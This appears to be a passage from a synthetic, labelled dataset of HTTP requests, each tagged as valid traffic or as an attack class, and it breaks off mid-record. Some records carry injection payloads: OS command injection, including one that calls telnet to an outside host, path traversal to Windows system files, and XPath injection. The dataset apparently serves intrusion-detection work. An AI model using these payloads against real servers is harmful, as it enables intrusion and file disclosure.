Via: FTP/1.5 www.Eslendi.gif, HTTP/0.0 247.45.42.7
Transfer-Encoding: identity
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 585 www.081x.html "mItb" "Sat, 28 Jan 06 07:00:52 GMT"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 981815102258
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28085
Start - Id: 43944
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.6xfahhids.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=319
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="4"
Date: Wed, 23 Nov 05 01:16:22 CET
ETag: "CAA1BX3UtwQhtOdd"
Expect: Ktdna
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Tue, 04 May 10 02:09:59 UTC
If-Unmodified-Since: Fri, 24 Nov 06 17:25:07 GMT
If-Match: "Ed_MEUpQFIM27pN2sk"
If-None-Match: *
If-Range: "ZVY.pIs44xPL@0TKY"
Max-Forwards: 8291
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: 4bhso opohyO=ucsru
Range: 40927-72
Referer: /asrer0e/ddIe.cfm
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/0.0 (compatible; dsnmoeytyp; Windows NT; 8hrns2tNt; Dyshio)
UA-CPU: 68000
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43944
Start - Id: 45336
class: PathTransversal
GET /jaeweri5eUucrrsn/enTq0TKLP/tsegcAepcusaslaou/fAUwHra7YvoSVN3F/c9rno/eO5bqsE3JC.k3ps/nph-xhISTN/ivLECAXSS9e3gG66Eloy/uquOi8NO7Q2Ob8TsfM/E2JqdropnZxmieJjF/nCwgURmmV4WjjewAru/rU..htm?2e5=5644325&ldeao9l=ekIaTT.%40-p&oa=dMet46tw2&ieooRtgpa=n%3D&WYb=ia5U0-m-Y&piTrdyvaN9aa6n=+ipt4braaccess_logn&DQ2admintXGSgSu=c7eautoexecta7-mpehc HTTP/1.1
Host: www.LeonJ.st
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.1, deflate;q=0.2, gzip;q=0.4, deflate, deflate;q=0.0
Accept-Language: gyda-y, kw-p
Cache-Control: max-age=363
Client-ip: 172.207.197.187
Cookie: HcdohnlM=20232470;hiapmte=fseoinputsEcelr;nrngc=..\..\..\..\..\..\..\..\..\WINNT\system.ini;hriyueh8=O6;fmDcfaana=63012558
Cookie2: $Version="2"
Date: Mon, 13 Aug 07 15:38:59 GMT
ETag: W/"sfLuQDFkiezeB1F0mgZ"
Expect: 100-continue
If-Modified-Since: Sat, 08 Mar 08 24:03:58 UTC
If-Unmodified-Since: Sat, 25 Oct 08 21:54:03 GMT
If-Match: "TsBTPADAiCp@lmdrWxV"
If-None-Match: "Im.p_-lmfBwSe.b.O@bX"
If-Range: Wed, 01 Oct 08 02:48:02 UTC
Max-Forwards: 3
Pragma: nbema='Suknyh'
Proxy-Authorization: Digest nonce
Authorization: t8ss pnSushly=radwpehc
Range: -916323,2-
Referer: /t76d/eioL4Ote.jpeg
TE: trailers,chunked
Trailer: If-Range
User-Agent: o8eleljyH/1.9.8.5
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 785x0560
Via: 8.2 84.141.168.139, FTP/1.7 100.75.188.216:11, osaa/0.1 www.4h9cc4aj.png:322
Transfer-Encoding: compress
Warning: 683 122.229.130.41 "sNgehvzmknriNSoe" 
X-Forwarded-For: 218.213.221.249
X-Serial-Number: 30132021855542164
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 45336
Start - Id: 4507
class: Valid
PUT /eiasEsrnexQls/lac/UXMgbhI9/hrdrnee/eFstETS-jjypxON8l/ala5Y_y0gLWRX.cgi? HTTP/1.0
Content-Length: 146
Content-Language: llv
Content-Encoding: gzip
Content-Location: /qDnbyly/8taypzrt.nsf
Content-MD5: Z2Nkcm9OcG90ZWFpSHlvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jan 06 04:26:34 CET
Last-Modified: Mon, 05 Dec 05 21:15:35 GMT
Host: 3.24.81.253
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity;q=0.3
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 211.161.242.52
Cookie: niialathf=eelraeoUu0;htrbiheaaai=cdivyrb)3Dtlw;nN0h8hhb0bKp=e6jPwrJA_qG;access_logk3ciSTeDELG=283;sytof3=7346974
Cookie2: $Version="3"
Date: Mon, 19 Jul 04 03:57:37 UTC
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: wRtte
From: trfer8@djiccb.net
If-Modified-Since: Thu, 24 Jun 04 12:16:12 UTC
If-Unmodified-Since: Wed, 10 Oct 07 18:56:20 UTC
If-Match: "BLwD9iMqK07S2rMcNM"
If-None-Match: *
If-Range: Thu, 07 May 09 10:52:10 UTC
Max-Forwards: 518
MIME-Version: 5.0
Pragma: eseoua=ms2R
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: Basic dnlzbWFsOnRyc25uaHQ=
Range: 48-
Referer: /Adldr4/taWtdn.cgi
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 9.4; c3-pu; rv:3.0.7) Gecko/43678605
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 654x7846
Via: 2.8 111.109.105.80, HTTP/0.0 www.sft4.png, 5.1 www.7ulq.png
Transfer-Encoding: gzip
Upgrade: aensr/9.0, tag/3.6
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

antyte=448&e6ogwO47Aeo=95&netrt1hriuBesag=uxHYaiup&s8sxEts2s1gsedo=qddaTeah&dmmob=8&ujkeain=24003311&Eie7be=oeRaGroTz&BbGnFp6@=aTPNfZI&jcatG8_=hts

End - Id: 4507
Start - Id: 7820
class: Valid
POST /rBcFo@P1_u80FWhbAJnf/bkd7te/e2xBTFmMf@DP/xi2binfsaitSei2tt/HOivsOyluCnlEkpg5us/-0@S8i3kw/aytrntlaw/ineochlr/bRRe7hg/jenHv1brhaetn1htehs.jpeg? HTTP/1.0
Content-Length: 158
Content-Language: oru,45ri,rMatoDy
Content-Encoding: compress
Content-Location: /iiaae/HeeM/Hruselp/wiet/aAnshiee.gif
Content-MD5: dXRpc21jaWhhaW9jN3NTYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 04 17:43:55 CET
Last-Modified: Tue, 25 Nov 08 06:38:27 CET
Host: 194.205.68.107:80
Connection: keep-alive
Accept: audio/basic;q=0.6, audio/*;q=0.3, image/*;q=0.5
Accept-Charset: windows-1252;q=0.6, iso-2022-jp, iso-8859-7, x-mac-ce;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=651
Client-ip: 115.95.108.135
Cookie: F9yw5nz=dVKQ7i.U;2xZprn=beEwpSdsa21 let;o2tt74k=13077987
Cookie2: $Version="675"
Date: Wed, 20 Oct 04 08:24:48 GMT
ETag: "68kh4lmaleAcjYJu.WF"
Expect: 100-continue
From: k7euba@tlndi8g.org
If-Modified-Since: Fri, 04 Nov 05 17:02:30 CET
If-Unmodified-Since: Thu, 18 Dec 08 19:12:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 682
MIME-Version: 6.1
Pragma: jnf=shtgsi
Proxy-Authorization: Basic cnJobjpuZldh
Authorization: Basic aWxncjpxaGJh
Range: 7699-
Referer: /lorqd/szaea.nsf
TE: gzip,trailers
Trailer: Warning
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 4.1; ir-ec; rv:8.1.1) Gecko/79234736
UA-CPU: MIPS
UA-Disp: 716,3667,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 669x1617
Via: HTTP/3.5 9.90.94.25:91, 2.1 www.x7uli2e.jpeg
Transfer-Encoding: deflate
Upgrade: le7/5.5, eimt/4.8
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 78120042930082
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

all=26177703&atoh=hifrh6ewia &Kaccess_logjYsBD_X8r=12047&xo=steipfw&zcu7Iacedik=eRjIU&oqTAuaYad2ybuht=5025851&eytjidZn7idesL=waw&idokcsNei=cehst= cdhT7Wlsxl

End - Id: 7820
Start - Id: 26610
class: Valid
GET /poNIeRf7Yc7oMQ.css?Hl9rknw=9esbS9uAut&01kheh=frr&eis=kgnChnh&AuMfWwM5bH=ncevhh2airriots%24&dTT=eniei2y8oheUlti HTTP/1.1
Host: www.nltdstItxu.fr
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3, isiri-3342, x-mac-hebrew, euc-jp;q=0.9, iso-10646-ucs-2;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 60.195.247.35
Cookie: xtssageashaiydA=46052976;Elhl=Ou5eglgTaouToue;neoaansi=herhdrtpuloet iframeautoexecw
Cookie2: $Version="4"
Date: Sat, 14 Jun 08 19:05:56 CET
ETag: W/"he9PqfD4zQ_hLiYRDd@@"
Expect: tntonh
From: heayt2@etn3.it
If-Modified-Since: Fri, 14 Mar 08 09:46:49 UTC
If-Unmodified-Since: Sun, 05 Dec 04 14:24:27 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Jun 06 24:11:17 CET
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic ZWFzcmZUczY6YmlkaXc=
Authorization: Basic aXJ3aGE6cmxuM2xhc2k=
Range: 3-,788456-3,6670-026581
Referer: http://www.adhknbtd.ch/ej7f/oyah/6qtipen/setr/hstL.txt
TE: chunked;q=0.7
Trailer: Referer
User-Agent: Mozilla/7.4 (compatible; Konqueror/3.8; Win98; cGaoa4Ay3; etrdoDptng; dben2rAzd0)
UA-CPU: Sparc
UA-Disp: 3286,345,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: FTP/9.1 www.eggi8.shtml, eon/9.6 164.207.33.134, apb/3.8 www.teuhIa.jpeg
Transfer-Encoding: deflate
Upgrade: oBLc/1.1, eoeeSe/9.0, SsT/2.4
Warning: 472 51.16.225.72 "ie2nQuyerrj" 
X-Forwarded-For: 227.175.6.41
X-Serial-Number: 693373977262
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26610
Start - Id: 46386
class: PathTransversal
GET /3Sot/siht/vHs8iii2e/5wcrmsdoytL0liteSmd.htm?eada2aNgaw=h%3A%2F.htaccess%7E&Vdiw3oiei=28816 HTTP/1.1
Host: 8.48.125.25
Connection: keep-alive
Accept: application/*
Accept-Charset: koi8, euc-kr;q=0.9, iso-8859-8-i, iso-8859-8;q=0.6, gb2312
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: irA0e='epnseh'
Client-ip: 230.204.6.13
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Tue, 09 Feb 10 18:33:21 GMT
ETag: "ql0484w1O30JHkv1kQE7"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Tue, 25 Nov 08 16:58:50 UTC
If-Unmodified-Since: Sun, 22 Aug 04 09:23:32 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "ZEvCD@QUg8SiH@BPGeQ"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 5
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest qop=la8es
Range: 2-1818,846125-
Referer: /2aahE/eEnjo/z2rsipe.shtml
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: srnjes9
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
Transfer-Encoding: xhada; oUlhts7t=tam8
Upgrade: IMk/1.8, Qse8/0.7, nshjes/7.8, e3niDt/5.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46386
Start - Id: 17988
class: Valid
GET /swqyIJfOBO6T/EUaFgFobmte/mJDALP6CCN/@x6b/ePsKtzpk/iPa3m8.nsf?pnz=18226&apwNl9So=+ HTTP/1.1
Host: 66.158.32.87
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=6
Client-ip: 195.151.147.160
Cookie: iTvd=3Arutrynh9ef;rWrmebQ=ns%u ;sOzsh=i5vdpLdDfTB;Crmzaccept9=145705493;Adn=97346
Cookie2: $Version="07"
Date: Fri, 27 Apr 07 21:39:21 UTC
ETag: W/"v_bZgiUX_t931JyZ"
Expect: 100-continue
From: rm7tU@Pprctei.org
If-Modified-Since: Mon, 01 Oct 07 12:00:57 GMT
If-Unmodified-Since: Fri, 16 Feb 07 10:52:06 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7546
MIME-Version: 0.7
Pragma: plsmno='afa3h'
Proxy-Authorization: NTLM cmVpeXNyYXlvZVRlczRpZWFFZWVPSG9lbGlvaW95YWZ1aWRub3I3Y3I=
Authorization: Digest cnonce="tLhwto"
Range: -44534,46459-4352,54-118133
Referer: /nzxcoeh/bsx0asn/h2cgnOf.php
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: ldiz2nBoaCcdoT7axi
UA-CPU: Sparc
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 642x5791
Via: FTP/1.0 www.dsmLh9c.gif
Transfer-Encoding: gzip
Upgrade: cnfwrA/0.9, une/2.8, wm5eaE/8.6, 5Anel/9.5, a2n/0.8
Warning: 459 241.242.121.187 "idot1nq9S" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 84617847595022
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17988
Start - Id: 34862
class: Valid
PUT /tq-/fnteStiKldsd/neca61rWe6oyeref1emi/tbgy4CE@EDrTmXRh5et/haHDPfIuRUzsX5b/d6_2jiDJ66I33/JmochaorLSKdE5M2_n/qosI1/cmiNRtomft/wVN9.jpeg? HTTP/1.0
Content-Length: 80
Content-Language: srS
Content-Encoding: deflate
Content-Location: http://www.vreA.gov/2yfbt.htm
Content-MD5: bGV0c3JUcmVudHNyRTc0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Jul 09 01:20:10 UTC
Last-Modified: Tue, 09 Jan 07 12:52:47 GMT
Host: 138.236.169.72
Connection: refh
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Ds6eOsss-aeedicae;q=0.7
Cache-Control: min-fresh=77971
Client-ip: 16.173.211.89
Cookie: nzp=omdrcasieorntIum6;bHcindiz9=523
Cookie2: $Version="00"
Date: Wed, 05 May 04 23:05:23 UTC
ETag: W/"GWdSysx8IvCsLPPeu"
Expect: 100-continue
From: Jnyui@7erErt.cz
If-Modified-Since: Sat, 22 Dec 07 23:22:54 CET
If-Unmodified-Since: Fri, 11 Jan 08 15:42:39 GMT
If-Match: "6iU2lGWTCbbV8DLi"
If-None-Match: ".zdgMVETTTwIC2qcix"
If-Range: Wed, 05 Oct 05 21:37:28 CET
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: http://www.rdn7i9pe.fr/2zTbe/emtus.swf
TE: deflate;q=0.9,chunked;q=0.2
Trailer: Trailer
User-Agent: 3ahSn/4.5.4.7.3
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-Color: color8
UA-Pixels: 3738x0584
Via: 6.5 185.232.195.233
Transfer-Encoding: gzip
Warning: 645 www.2ypllvgg.png "Dtceaslha" 
X-Forwarded-For: 235.64.29.202
X-Serial-Number: 26564430456596
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

w5qRsaDArna=131&eno=rnetcatNa hSO/fu sA&0NnL=sOxbZtk8m62&esrknadJeja4=hj92SKIU

End - Id: 34862
Start - Id: 4671
class: Valid
POST /adeteracc6ro/earogv/v8I3tLsamanerwj/wg_a65fDLl3cD_79/_oPQopen5X0eP-Bwp-/pahc/hnid3uDec2seaorhlqm/node-x9PwjmuQF2F.7/taui9Nnenateewcfod/aymhtsoniwotre/37iestibrle7deICeth/a14@.gif? HTTP/1.0
Content-Length: 36
Content-Language: ses,ts
Content-Encoding: compress
Content-Location: /dto5/ipgwsnne.gif
Content-MD5: b24xYWNtM0RsYWVzdXl0SQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Oct 06 18:01:57 UTC
Last-Modified: Sun, 04 Apr 10 05:32:44 GMT
Host: www.fpnersaSe.com
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 138.205.233.134
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="2"
Date: Thu, 08 Jun 06 21:28:00 GMT
ETag: W/"GNMzKzyE2ZglxXAupYRN"
Expect: 100-continue
From: es6emnTp@6gdtmKmk.uk
If-Modified-Since: Thu, 22 Dec 05 13:10:18 GMT
If-Unmodified-Since: Sun, 17 Jun 07 23:29:38 UTC
If-Match: *
If-None-Match: *
If-Range: "F5g_S1N-ENGStoiOk"
Max-Forwards: 37
MIME-Version: 3.8
Pragma: 5vwWRs=u
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic MG5udDpvc3RjOHVldQ==
Range: 511-,489649-576168,-523
Referer: /ua5tocas/h4em/xfNc/rrRewi4/Nyetni.wmn
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: lfkasu4gl8toad5enr
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 111x089
Via: 2.0 0.41.4.21, 2.8 www.ezeh.jpg
Transfer-Encoding: gzip
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 238 148.230.14.82 "4rrh4aee0nl" "Tue, 25 Jan 05 05:33:08 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 42430609467360464
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

tSMogaoSoxpaDe=a&cihI=e&eEdt=mJgfzYe

End - Id: 4671
Start - Id: 8993
class: Valid
GET /pbnzTertn91Rnt4eri/degdurn6uemain/3esdqficsset4eMvszf/ennhelvo6flonterpq/o.8u1ExtpXabR9C/oUPeUofYQxmNRm/eMdJQlJ.html?yt9aeb=qjkkJzIg3 HTTP/1.0
Host: www.HoSU.com:9306
Connection: e0yyvte
Accept: */*
Accept-Charset: windows-1255, iso-8859-5;q=0.3, isiri-3342
Accept-Encoding: compress;q=0.6, identity;q=0.5, compress, deflate;q=0.0
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 89.96.201.213
Cookie: ilt=nllirfjjiide;breea=tv7Qq_;3R%utz_RlJns=qaoe%5De0ecdw%25doeem%26hE
Cookie2: $Version="7"
Date: Thu, 20 Oct 05 09:13:15 GMT
ETag: W/"tITEZe2a@b90OdzSpI@"
Expect: 100-continue
From: lstucdNi@eei2smta.net
If-Modified-Since: Sat, 29 Jul 06 02:30:51 CET
If-Unmodified-Since: Tue, 28 Aug 07 09:24:06 GMT
If-Match: "0uaUIluiBR_bJ-iq"
If-None-Match: *
If-Range: Thu, 08 Jun 06 07:44:23 UTC
Max-Forwards: 2892
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: lsSh2 t9tteeo=y7a2ree
Authorization: NTLM YmdVTG9pdGFpdjhyY29UY2xlc2dIMjlsNGhlcmhvZWl0YVY5dGhpMHJtY25IbVI=
Range: -3579
Referer: /crcwds/e1rw31/7ay7hoOl/sean.wmn
TE: trailers
Trailer: Trailer
User-Agent: bxmeutaksa
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7350x9086
Via: 9.9 237.84.219.79
Transfer-Encoding: deflate
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8993
Start - Id: 30620
class: Valid
GET /pnICp7M.php3?oLetllrgac=w%3Es&6oai=lsrg5irq7&noz6h7nr1tiposl=ttudeoiolNseadAhn&XmailZNeK4G_accept=2310 HTTP/1.0
Host: www.9hHtao.org
Connection: close
Accept: image/*, image/*;q=0.6, audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: reeIxiy-uga;q=0.8, ra-a6aue;q=0.1, degh-fUvia, 5hox-ht;q=0.2, rou-nAt
Cache-Control: efO='l5uAvA'
Client-ip: 129.82.35.213
Cookie: tu-3LrXpasswdWFiR=(a;jzd4ot=lErOe7eap;aeze=31;e5Her=87438893
Cookie2: $Version="85"
Date: Fri, 14 Oct 05 16:50:29 GMT
ETag: W/"L6Mud51U0iCSY8tmJr"
Expect: 100-continue
From: ewemen@Ld96ee.de
If-Modified-Since: Thu, 23 Sep 04 03:40:30 GMT
If-Unmodified-Since: Sat, 04 Jul 09 02:19:56 GMT
If-Match: "aLOGOrc_UBhFU@NjQst"
If-None-Match: *
If-Range: "GTZH..j1P0WmYte"
Max-Forwards: 9505
MIME-Version: 5.5
Pragma: knn=heisus
Proxy-Authorization: tgfge aunbuc=stss
Authorization: 6nnO cicn1=lItu9
Range: -44,-9596,885-03597
Referer: http://Entm.be/ppeokyE/9iwmg/5phdhrv/deiyaIai/2oyeqi.zip
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 1.6; av-1s; rv:2.9.7) Gecko/87959280
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9301x810
Via: FTP/2.8 www.cdbe.gif
Transfer-Encoding: compress
Upgrade: 0gtw/9.1, Wtkt/5.8, Hes6g/7.6, RE4ntd/6.1
Warning: 003 140.236.66.157 "ttnePr2eio6og" "Sat, 29 Oct 05 06:33:54 UTC"
X-Forwarded-For: 147.151.22.151
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30620
Start - Id: 50008
class: XPathInjection
POST /iuekToeybhlAew/en8aaie2ln8ed/dnvFklN91CKDY8a.gif? HTTP/1.0
Content-Length: 33
Content-Language: se0u28t,ea
Content-Encoding: compress
Content-Location: http://www.dtwnWooy.biz/2kLeat/xEewd1d/jEIasjiD.jsp
Content-MD5: YTZyN2Vpc2RtMWVwaHJlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Fri, 03 Feb 06 02:08:46 GMT
Host: 11.204.198.43:80
Connection: 2rerP
Accept: text/plain;q=0.8, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 18823 or    z/hRJO/ov1e3/child::node()[position()=6]     or     11878=
Cache-Control: max-age=1581
Client-ip: 119.180.39.9
Cookie: qHi=r2mkjaw;rkEde0csl9ceD=2i
Cookie2: $Version="26"
Date: Sun, 01 Apr 07 01:19:53 CET
ETag: W/"_2XPRTZTzEEtnxCG"
Expect: 100-continue
From: oefc@rair.ch
If-Modified-Since: Thu, 08 Apr 10 10:25:26 UTC
If-Unmodified-Since: Thu, 23 Aug 07 04:06:21 CET
If-Match: "agKr.tfL5GDA7kCnLWkw"
If-None-Match: "YhkLJcVJBVd6DnAy8dz"
If-Range: "Y5xw@QZ.lyASgcJA8"
Max-Forwards: 7727
MIME-Version: 7.6
Pragma: pe='i'
Proxy-Authorization: Digest opaque="Esaae"
Authorization: NTLM aFd5aGZoRGVEc2UzbTBlYWR0ZWxyZnFzenJNN2lockxCbTR0aWFpcmNhdXJoOA==
Range: 1-0902
Referer: http://isnf.com/weevo/n5hsfei.cfm
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/6.2 (compatible; Konqueror/8.3; Solaris; n4riasc; 2aomohnoez; h0r75)
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Pixels: 957x1532
Via: FTP/6.1 23.174.15.28, flswh/5.3 www.esAPea.jpg:6399
Transfer-Encoding: tarr
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

ttIohrrfs=httpsi&B0o0otutT=991209

End - Id: 50008
Start - Id: 43085
class: OsCommanding
PUT /srtT-FpQ44QE9LCdyZ/ALY.aspx? HTTP/1.1
Content-Length: 241
Content-Language: emb,eoe
Content-Encoding: gzip
Content-MD5: eHJsZmVpbnVuYTFkM2dwZA==
Content-Type: application/x-www-form-urlencoded
Host: 201.66.195.135:80
Connection: close
Accept-Charset: iso-8859-8-i;q=0.6, cp-936;q=0.2
Accept-Encoding: compress, deflate, identity;q=0.5
Cache-Control: no-transform
Cookie: WnBKelibOGLH=e48dtq;WlinoceLGbI6=ff2SMkD4;cemfx=6594809;i2v=huqaqs taap;nsomsSttdnwIai=ioXG31IV
Cookie2: $Version="466"
Date: Sun, 11 Dec 05 13:12:50 GMT
ETag: W/"mdXR3j0NM3wblChswxg"
If-Range: *
Pragma: no-cache
Referer: http://www.s0adte0a.ch/e8or/epoleje/ciiUooo.wmn
User-Agent: Mozilla/8.3 (X11; U; Open BSD i586 9.9; ow-qo; rv:4.4.0) Gecko/00632282
Via: titlu/4.9 www.ivtozo.htm
----: -------------

i32P3=Maeaj&muyqosfb=erGXeS-&pndcimg2=tO_QqLfNRLqG&0hgatw7M2=5998&hm=t&xkt3agrD=i@SQRPwd9&bke= dye+httpsn&rU.6lbA.l=wFY_XUaK&ld=boot.iniotyunionncH9i0or&ncer=\"  \;    \/usr\/bin\/telnet   www.stmellalll.com  04\;

End - Id: 43085
Start - Id: 17197
class: Valid
GET /xIetndeKeheualyaui9/enaonyua/tnt2crttrnaelou5qnta/lmdonilf/lRw5SQfdsap/uH/pjVDF_wBd.png?Tltr2w=3082380&nwia=t4tSasdahScqheiedl&rtR1nabpAy=41527823&osaea0tf3si3u5=1&TlRe1bkhtaSsh=u37ng&hiigz=5369&aie7i1=revarw0azrMrm&ohrndtdezaan=8357545&uemobitzrmee=13251649&8B18ZOT=5&UhttpX_CTq9Fhq=ooohnulletafrd4emqsnN%26&eqtluuAreU3a=kxenePix HTTP/1.1
Host: 46.247.213.98
Connection: wrlrmn
Accept: */*;q=0.1
Accept-Charset: x-mac-greek, ks_c_5601-1987;q=0.6, cp-936;q=0.9, windows-1251;q=0.2, cp-936;q=0.6
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: min-fresh=30
Client-ip: 106.60.218.207
Cookie: llntAornavpiahn=at0oe;objectwinnt4Y3Pims1K0=o;ewlbdesdrt=4pf;5FvR7BP9x=tUShEdcb@5WE;rRFJd04=9moniSy
Cookie2: $Version="62"
Date: Mon, 25 Dec 06 14:43:02 CET
ETag: W/"xQyy02MPibL3sH4"
Expect: 100-continue
From: esabrd@aecmV.uk
If-Modified-Since: Wed, 19 Oct 05 01:58:16 UTC
If-Unmodified-Since: Sun, 09 Jan 05 18:46:29 UTC
If-Match: "yQ8ogSdbQfha37R"
If-None-Match: "4Kix1kgPQOFrzZE0"
